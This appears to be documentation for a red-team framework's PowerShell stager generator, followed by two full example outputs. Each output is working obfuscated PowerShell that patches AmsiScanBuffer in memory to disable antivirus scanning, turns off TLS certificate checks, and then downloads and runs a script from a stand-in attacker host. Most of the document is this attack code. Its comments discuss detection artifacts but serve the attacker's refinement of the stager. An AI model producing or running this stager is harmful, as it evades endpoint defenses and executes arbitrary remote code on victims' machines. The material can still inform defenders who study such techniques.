ps_generic_stager

Description

Generates an obfuscated PowerShell stager that applies an AMSI bypass (to suppress AV interference with script execution) before downloading and executing another PowerShell script.

Overview

The purpose of this pipeline is to enable the download and execution of any PowerShell script in such a way that the script hosted at the specified URL does not require any obfuscation or modification. Simply run this pipeline with the URL where you are hosting the PowerShell script. Note that the generated stager disables TLS certificate validation for the download (see the example output below), so the hosted script is fetched without verifying the server's identity — host the payload only on infrastructure you control.

Parameters

Parameter Name Type Description
URL string The URL for the PowerShell script to run. This parameter is mandatory.
BypassTechnique PwshAmsiBypassTechnique The specific AMSI bypass technique to use. Default: ‘AmsiScanBufferStringReplace’.

Example

The command below, when run from a Specter, will generate an obfuscated PowerShell script that downloads the PowerShell script hosted at https://www.evil.com/payload.ps1 and runs it.

Get-Payload 'ps_generic_cradle' -Args @{
	URL = 'https://www.evil.com/payload.ps1'
}

The output will vary from run to run (the generated class and method names, the string fragmentation and the format-string splits all differ), but representative output looks like this:

if($PSVersionTable.PSVersion.Major -gt 2) {
    $subject = [string]::format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}{24}{25}{26}{27}{28}{29}{30}{31}{32}{33}{34}{35}{36}{37}{38}{39}{40}{41}{42}{43}{44}{45}{46}{47}{48}{49}{50}{51}{52}{53}{54}{55}{56}{57}{58}{59}{60}{61}{62}{63}{64}{65}{66}{67}{68}{69}{70}{71}{72}{73}{74}{75}{76}{77}{78}{79}{80}{81}{82}{83}{84}{85}{86}{87}{88}{89}{90}{91}{92}{93}{94}{95}{96}{97}{98}{99}{100}{101}{102}{103}{104}{105}{106}{107}{108}{109}{110}{111}{112}{113}{114}{115}{116}{117}{118}{119}{120}{121}{122}{123}{124}{125}{126}{127}{128}{129}{130}{131}{132}{133}{134}{135}{136}{137}{138}{139}{140}{141}{142}{143}{144}{145}{146}{147}{148}{149}{150}{151}{152}{153}{154}{155}{156}{157}{158}{159}{160}{161}{162}{163}{164}{165}{166}{167}{168}{169}{170}{171}{172}{173}{174}{175}{176}{177}{178}{179}{180}{181}{182}{183}{184}{185}{186}{187}{188}{189}{190}{191}{192}{193}{194}{195}{196}{197}{198}{199}{200}{201}{202}{203}{204}{205}{206}{207}{208}{209}{210}{211}{212}{213}{214}{215}{216}{217}{218}{219}{220}{221}{222}{223}{224}{225}{226}{227}{228}{229}{230}{231}{232}{233}{234}{235}{236}{237}{238}{239}{240}{241}{242}{243}{244}{245}{246}{247}{248}{249}{250}{251}{252}{253}{254}{255}{256}{257}{258}{259}{260}{261}{262}{263}{264}{265}{266}{267}{268}{269}{270}{271}{272}{273}{274}{275}{276}{277}{278}{279}{280}{281}{282}{283}{284}{285}{286}{287}{288}{289}{290}{291}{292}{293}{294}{295}{296}{297}{298}{299}{300}{301}{302}{303}{304}{305}{306}{307}{308}{309}{310}{311}{312}{313}{314}{315}{316}{317}{318}{319}{320}{321}{322}{323}{324}{325}{326}{327}{328}{329}{330}{331}{332}{333}{334}{335}{336}{337}{338}{339}{340}{341}{342}{343}{344}{345}{346}{347}{348}{349}{350}{351}{352}{353}{354}{355}{356}{357}{358}{359}{360}{361}{362}{363}{364}{365}{366}{367}{368}{369}{370}{371}{372}{373}{374}{375}{376}{377}{378}{379}{380}{381}{382}{383}{384}{385}{386}{387}{388}{389}{390}{391}{392}{393}{394}{395}{396}{397}{398}{399}{400}{401}{402}{403}{404}{405}{406}{407}{408}{409}","us","in","g 
S","yste","m;`r`n","u","sin","g ","Syst","em",".Run","time",".Int","ero","pSer","vice","s;","`r`n`r`n","p","ubli","c"," cla","s","s C","o","ntro","l3Ws","uUni","on"," {`r`n","   ","  ","  "," [Dl","lIm","por","t(`"","kern","el","32","`")]","`r","`n  ","    "," "," p","ubl","ic ","stat","i","c ","ex","t","ern ","Int","Ptr"," G","etPr","ocAd","dres","s","(Int","P","t","r hM","od","ul","e",","," ","s","tri","ng ","pro","cN","a","m","e)",";`r","`n`r`n","  ","  ","    ","[","Dll","I","mp","or","t","(","`"k","erne","l32`"",")]","`r`n","   "," ","   "," pub","lic ","stat","ic"," e","xte","r","n I","ntPt","r ","Loa","dL","ib","rary","(st","r","ing"," nam","e);`r","`n`r`n ","  ","    "," [Dl","lImp","ort(","`"ker","nel","32","`")]","`r","`n ","   "," ","   ","pu","bl","ic s","tati","c ex","t","ern ","bool"," ","Virt","ualP","rote","ct(","In","t","Ptr ","lpA","dd","ress",","," ","U","I","ntPt","r d","wSi","z","e, u","i","nt ","f","lNew","P","rote","ct",","," o","ut u","int ","lpf","lOld","Pro","tec","t",")",";","`r`n","`r","`n","    ","  ","  pu","blic"," ","sta","ti","c ","IntP","t","r ","P","a","irin","g2M","eth","P","ars","ed(I","n","tPtr"," h","Modu","le,"," ","s","tri","ng ","p","rocN","ame",")"," {`r`n","   "," ","  ","  ","    ","r","et","u","rn C","on","tro","l3","Wsu","Unio","n.G","etPr","oc","A","dd","re","s","s(","hM","odu","l","e, p","rocN","a","me);","`r`n"," ","   "," ","  "," }","`r`n`r","`n ","  "," ","  ","  p","u","b","lic ","s","t","at","i","c In","tPt","r Un","der","l","ineM","of(","st","ring"," na","m","e) {","`r","`n"," ","   ","  "," "," "," ","  "," ","ret","urn ","Cont","r","ol3W","s","uU","ni","on",".Loa","dL","ibr","a","r","y(n","am","e);","`r`n","    "," ","   }","`r`n`r","`n ","  "," ","  ","  pu","bli","c s","t","atic"," b","ool ","Loa","ding","Matr","ix4x","4","(Int","Pt","r"," l","pA","d","dr","es","s",","," UIn","t","Ptr"," dwS","iz","e",", ","u","in","t ","flNe","wPr","ot","ect,"," out"," ","uint"," ","lpfl","Old","Pr","ote","ct",") 
","{`r`n","  "," ","  ","  ","  ","   r","etur","n ","Con","tro","l3","Wsu","U","nion",".Vi","rt","ualP","ro","te","ct","(l","p","Ad","dre","s","s",","," dw","Si","ze,"," f","lNew","P","ro","tect",","," out"," lpf","l","Ol","dPro","t","ect",")",";`r","`n  ","    "," "," }","`r","`n  "," "," }")

    # $subject holds the C# source assembled above: a P/Invoke wrapper class with
    # a randomised name (here Control3WsuUnion) exposing kernel32's GetProcAddress,
    # LoadLibrary and VirtualProtect behind randomised method names. Add-Type
    # compiles it at run time; in Windows PowerShell this typically spawns the
    # C# compiler and writes temporary files, which is itself an observable
    # artifact on the host -- confirm in your environment.
    Add-Type $subject

    # Load amsi.dll via the LoadLibrary wrapper. The module name is assembled at
    # run time from fragments so the literal string never appears in the file.
    $computername = [Control3WsuUnion]::UnderlineMof(([string]::format("{0}{1}{2}{3}","a","m","si",".dll")))
    # Resolve the exported AmsiScanBuffer function via the GetProcAddress wrapper.
    $function = [Control3WsuUnion]::Pairing2MethParsed($computername, ([string]::format("{0}{1}{2}{3}{4}{5}","Amsi","S","c","anBu","ff","er")))
    # Receives the previous page protection from VirtualProtect; it is never
    # used afterwards, so the original protection is not restored.
    $method = 0
    # Make the start of AmsiScanBuffer writable+executable (0x40 = PAGE_EXECUTE_READWRITE).
    # Review note: 5 bytes are protected here but 6 bytes are written below.
    # VirtualProtect rounds to page granularity, so this works in practice, but the
    # size should match the patch length. The page is also left RWX afterwards,
    # which is a memory-scanning artifact defenders can look for.
    [void][Control3WsuUnion]::LoadingMatrix4x4($function, [uint32]5, 0x40, [ref]$method)
    # Patch bytes: mov eax, 0x80070057 (E_INVALIDARG); ret. AmsiScanBuffer then
    # returns an error immediately, so no buffer is ever scanned.
    $allproperties = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
    # Overwrite the function prologue in place with the 6-byte stub.
    [System.Runtime.InteropServices.Marshal]::Copy($allproperties, 0, $function, 6)
}

# Disables TLS certificate validation for the whole process before the fetch:
# every server certificate is accepted, so an on-path party able to spoof DNS or
# TLS for the host can substitute its own script for the operator's payload.
# Treat that as a deliberate trade-off, not a free win. The URL is again built
# from fragments; the body is fetched with WebClient.DownloadString and executed
# via [scriptblock]::Create(...).Invoke() with no integrity check on the fetched
# text. Script blocks created this way are likely still captured by script block
# logging -- confirm against your target's logging configuration.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; [scriptblock]::Create(((New-Object System.Net.WebClient).DownloadString(([string]::format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}",'h','tt','ps:','//','www.','e','vi','l.c','om/p','a','yloa','d.','p','s1'))))).Invoke()
if($PSVersionTable.PSVersion.Major -gt 2) {
    $subject = [string]::format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}{24}{25}{26}{27}{28}{29}{30}{31}{32}{33}{34}{35}{36}{37}{38}{39}{40}{41}{42}{43}{44}{45}{46}{47}{48}{49}{50}{51}{52}{53}{54}{55}{56}{57}{58}{59}{60}{61}{62}{63}{64}{65}{66}{67}{68}{69}{70}{71}{72}{73}{74}{75}{76}{77}{78}{79}{80}{81}{82}{83}{84}{85}{86}{87}{88}{89}{90}{91}{92}{93}{94}{95}{96}{97}{98}{99}{100}{101}{102}{103}{104}{105}{106}{107}{108}{109}{110}{111}{112}{113}{114}{115}{116}{117}{118}{119}{120}{121}{122}{123}{124}{125}{126}{127}{128}{129}{130}{131}{132}{133}{134}{135}{136}{137}{138}{139}{140}{141}{142}{143}{144}{145}{146}{147}{148}{149}{150}{151}{152}{153}{154}{155}{156}{157}{158}{159}{160}{161}{162}{163}{164}{165}{166}{167}{168}{169}{170}{171}{172}{173}{174}{175}{176}{177}{178}{179}{180}{181}{182}{183}{184}{185}{186}{187}{188}{189}{190}{191}{192}{193}{194}{195}{196}{197}{198}{199}{200}{201}{202}{203}{204}{205}{206}{207}{208}{209}{210}{211}{212}{213}{214}{215}{216}{217}{218}{219}{220}{221}{222}{223}{224}{225}{226}{227}{228}{229}{230}{231}{232}{233}{234}{235}{236}{237}{238}{239}{240}{241}{242}{243}{244}{245}{246}{247}{248}{249}{250}{251}{252}{253}{254}{255}{256}{257}{258}{259}{260}{261}{262}{263}{264}{265}{266}{267}{268}{269}{270}{271}{272}{273}{274}{275}{276}{277}{278}{279}{280}{281}{282}{283}{284}{285}{286}{287}{288}{289}{290}{291}{292}{293}{294}{295}{296}{297}{298}{299}{300}{301}{302}{303}{304}{305}{306}{307}{308}{309}{310}{311}{312}{313}{314}{315}{316}{317}{318}{319}{320}{321}{322}{323}{324}{325}{326}{327}{328}{329}{330}{331}{332}{333}{334}{335}{336}{337}{338}{339}{340}{341}{342}{343}{344}{345}{346}{347}{348}{349}{350}{351}{352}{353}{354}{355}{356}{357}{358}{359}{360}{361}{362}{363}{364}{365}{366}{367}{368}{369}{370}{371}{372}{373}{374}{375}{376}{377}{378}{379}{380}{381}{382}{383}{384}{385}{386}{387}{388}{389}{390}{391}{392}{393}{394}{395}{396}{397}{398}{399}","u","s","in","g ","S","y","st","e","m",";`r`nu","s","i","ng 
","Sy","stem",".Ru","n","tim","e.I","nt","ero","pSer","vice","s",";`r`n`r","`n","publ","ic"," cl","ass ","C","ontr","ol3W","suUn","ion"," {`r`n","   ","    "," [Dl","l","Im","port","(","`"ker","ne","l32`"",")]","`r","`n  ","  "," ","  "," pu","blic"," sta","t","i","c ","ex","tern"," I","ntPt","r ","G","etPr","oc","A","ddr","ess","(","IntP","t","r hM","odu","le, ","str","ing ","p","rocN","a","me)",";`r`n`r","`n   ","  ","   [","DllI","m","p","o","rt(","`"ke","rn","el","32`")","]`r`n ","   ","   "," ","p","u","bli","c st","at","ic"," e","xter","n ","IntP","tr L","o","ad","L","ib","ra","ry","(s","t","r","in","g"," ","n","am","e",");`r","`n`r`n","    ","    ","[Dll","Im","p","ort","(`"ke","rnel","32`"",")]`r","`n ","  "," ","    ","pu","b","l","ic s","t","at","ic e","x","ter","n ","bo","ol"," Vi","r","tual","Pro","te","ct","(Int","Ptr ","l","pA","d","dr","e","ss,"," ","UIn","tPt","r d","w","Siz","e",", ","uin","t fl","NewP","ro","tect",", ","out"," ui","nt"," l","pflO","ldP","rote","ct);","`r`n`r`n"," ","  ","    "," pu","b","lic ","s","t","atic"," Int","Ptr"," ","Pa","ir","i","ng","2Met","hP","ar","se","d(In","tPt","r"," hM","odu","le",", ","stri","ng p","roc","Na","me)"," {","`r`n  ","   ","  "," ","    ","retu","rn ","Con","trol","3","Wsu","U","n","io","n",".G","e","tPro","cA","ddr","ess","(hMo","du","l","e,"," ","proc","Na","m","e)",";","`r`n ","    ","   }","`r`n","`r`n  ","    ","  ","p","ub","lic"," sta","tic ","Int","Pt","r ","Un","d","e","rli","neM","of(","stri","n","g n","ame)"," {","`r","`n  ","   ","    "," ","  r","etu","rn C","ontr","o","l3","WsuU","ni","on.","Loa","dLib","rary","(nam","e);`r","`n","   ","   ","  }`r","`n`r`n ","    "," ","  ","pub","lic"," st","atic"," ","boo","l ","Loa","din","gMa","tr","ix4","x","4","(Int","Ptr"," ","l","p","Addr","e","s","s, U","IntP","t","r dw","Size",", u","in","t fl","NewP","r","o","t","e","c","t,"," o","u","t"," uin","t lp","flOl","dP","rot","ec","t) ","{`r`n ","    "," ","   ","   r","etu","rn"," 
","Co","ntro","l3W","suUn","i","on.V","irtu","al","Prot","ect","(l","pAd","d","ress",", d","w","Size",", fl","N","ewPr","ot","e","ct",", ","out ","lp","flOl","dPr","o","t","e","ct)",";`r`n","    ","    ","}","`r`n ","   ","}")

    # Compile the C# wrapper assembled above (a class with a randomised name, here
    # Control3WsuUnion, wrapping kernel32 GetProcAddress / LoadLibrary /
    # VirtualProtect). Run-time compilation via Add-Type is itself observable on
    # the host (compiler process, temporary files) -- confirm in your environment.
    Add-Type $subject

    # LoadLibrary("amsi.dll"), with the name assembled from fragments at run time.
    $computername = [Control3WsuUnion]::UnderlineMof(([string]::format("{0}{1}{2}{3}{4}","am","s","i.d","l","l")))
    # GetProcAddress(amsi.dll, "AmsiScanBuffer"), again from fragments.
    $function = [Control3WsuUnion]::Pairing2MethParsed($computername, ([string]::format("{0}{1}{2}{3}{4}{5}","A","msiS","can","Buff","e","r")))
    # Output slot for the old protection; never read back, so RWX is never undone.
    $method = 0
    # VirtualProtect(AmsiScanBuffer, 5, PAGE_EXECUTE_READWRITE (0x40), &old).
    # Review note: the size (5) does not match the 6-byte patch written below;
    # page-granular protection makes it work anyway, but the values should agree.
    [void][Control3WsuUnion]::LoadingMatrix4x4($function, [uint32]5, 0x40, [ref]$method)
    # mov eax, 0x80070057 (E_INVALIDARG); ret -- forces AmsiScanBuffer to fail fast.
    $allproperties = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
    # Write the stub over the function prologue.
    [System.Runtime.InteropServices.Marshal]::Copy($allproperties, 0, $function, 6)
}

# Accept any TLS certificate (process-wide), fetch the payload text from the
# fragment-assembled URL, and execute it. Because certificate validation is off
# and nothing checks the fetched text, whoever can answer for that hostname on
# the wire controls what runs here -- keep the hosting endpoint under your
# control. The [scriptblock]::Create(...).Invoke() pattern is a common
# detection signature and is likely still subject to script block logging.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; [scriptblock]::Create(((New-Object System.Net.WebClient).DownloadString(([string]::format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}",'htt','ps:/','/ww','w.e','vil.','co','m/','p','aylo','ad.p','s1'))))).Invoke()